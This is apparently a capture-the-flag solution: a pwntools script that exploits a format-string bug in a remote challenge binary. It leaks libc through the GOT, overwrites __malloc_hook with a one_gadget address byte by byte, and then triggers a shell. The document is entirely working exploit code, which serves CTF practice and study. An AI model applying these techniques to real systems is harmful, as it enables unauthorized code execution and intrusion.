Tags: pwn format-string
Rating: 3.7
```
from pwn import *
e = ELF('./pwnable')
#p = process('./pwnable')
p = remote('binary.utctf.live', 9003)
libc = ELF('./libc-2.23_1.so')
context.arch='amd64'
s = True
def send(payload):
p.recvuntil('?\n')
p.sendline(payload)
print payload
if s:
return p.recvuntil(' is not',drop=True)
libc.address = u64(send('%7$s||||'+p64(e.got['puts'])).ljust(8,'\x00')[:6].ljust(8,'\x00'))-libc.symbols['puts']
print hex(libc.address)
s=False
one_gadget = libc.address+0xf02a4
for i in range(6):
send('%{}c%8$hhn'.format(one_gadget&0xff).ljust(16,'|')+p64(libc.symbols['__malloc_hook']+i))
one_gadget >>= 8
send('%100000c')
p.interactive()
```
